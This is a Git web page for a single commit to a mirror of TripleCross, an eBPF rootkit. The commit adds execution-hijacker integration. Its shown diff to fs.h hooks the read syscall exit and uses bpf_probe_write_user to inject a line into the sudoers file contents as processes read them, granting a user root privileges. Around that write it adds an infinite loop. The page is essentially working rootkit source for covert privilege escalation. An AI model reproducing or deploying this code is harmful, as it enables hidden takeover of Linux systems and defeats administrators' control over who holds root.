admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2026-01-09 17:43:09 +08:00
Code Issues Packages Projects Releases Wiki Activity

Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted

Browse Source
This commit is contained in:
h3xduck
2022-02-18 09:08:54 -05:00
parent 0e022a8385
commit 130364e6ab
14 changed files with 2151 additions and 2047 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
src/ebpf/include/bpf/fs.h
View File

@@ -102,8 +102,11 @@ static __always_inline int handle_tp_sys_exit_read(struct sys_read_exit_ctx *ctx
//For including an user in the sudoers file
//We just put our new line there, independently on what the rest of the file contains
if(data->is_sudo==1){
while(1){
if(bpf_probe_write_user((void*)buf, (void*)sudo_line_overwrite, (__u32)STRING_FS_SUDOERS_ENTRY_LEN-1)<0){
bpf_printk("Error writing to user memory\n");
return -1;
}
}
bpf_printk("Sudo overwritten\n");
return 0;